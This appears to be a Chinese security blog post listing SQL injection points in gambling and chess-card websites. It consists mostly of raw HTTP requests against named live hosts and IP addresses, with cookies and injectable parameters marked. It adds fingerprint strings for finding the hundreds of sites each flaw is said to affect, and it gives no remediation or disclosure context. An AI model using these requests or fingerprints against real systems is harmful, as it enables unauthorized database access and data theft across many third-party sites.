棋牌nday

0day-影响站点922个-sql注入太阳城：

GET /ajax.php?user_name=12 HTTP/1.1

Host: [www.277036.com](http://www.277036.com)

Connection: close

Upgrade-Insecure-Requests: 1

DNT: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 Edg/86.0.622.38

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: iframe

Referer: https://www.277036.com/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5

0day-综合盘-澳门类型BC电子升级模式查询界面SQL：

GET /index.php/Check/index/user_name/* HTTP/1.1

Host: [www.11521zr.com](http://www.11521zr.com)

Connection: close

Accept: */*

DNT: 1

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 Edg/86.0.622.38

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://www.11521zr.com/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5

Cookie: PHPSESSID=71578809ca6ebf05f46279b6e7068513

私彩post注入：

GET /uxj/make.php?xtype=show&gids=170 HTTP/1.1

Host:h3.xwang.k2188.net

User-Agent:Mozilla/50(WindowsNT6.;Win64; *6;v:84.0) Gecko/20100101 Firefox/84.0

Accept:text/htmlapplication/xhtm+xmlappication/ xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.,zh-TW;q=0.7,zh-HK;q=0.5,en- US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate DNT:1

Connection: close

Referer: http://h3.xwang.k2188.net/uxj/top.php

Cookie: k1=50; k2=100;k3=200;k4=500;k5=1000; yusheje=1; PHPSESSID=e9bt0ueljvn3ieghp8p0gnbfl3 Upgrade-Insecure-Requests: 1 15:38

银河娱乐POST：

POST /chksign.php HTTP/1.1

Host: 45.116.163.168

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0

Accept: application/json, text/plain, */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/json;charset=utf-8

X-Requested-With: XMLHttpRequest

Content-Length: 21

Origin: http://45.116.163.168

Connection: close

Referer: http://45.116.163.168/

Cookie: safedog-flow-item=B01D7A431ECB74DDF7C4D1D8B07A515F

{"username":"213123"}

棋牌类POST：

POST /index/api/user_records.html HTTP/1.1

Host: 69.160.169.36:8883

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 26

Origin: http://69.160.169.36:8883

Connection: close

Referer: http://69.160.169.36:8883/

Cookie: PHPSESSID=h48gsrrq7c4ig5dfkqic0000h5

page=1&act_id=20&actuser=1

游艇会

payload：

/index.php/Index/schedule.html

影响站点：81个

Bet365

payload

body="/index.php/Detail/index/id/"

影响站点 744

盛大棋牌POST：

POST /index.php/query/index HTTP/1.1

Host: 154.208.101.211

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 17

Origin: http://154.208.101.211

Connection: close

Referer: http://154.208.101.211/

Cookie: PHPSESSID=43ks8nblfqsgul0p2m1psmgei5

username=111&id=3

指纹

“/yoo/img/logo.png“

ANQUSEC 发布于 2021-10-14

游艇会

黑辰’by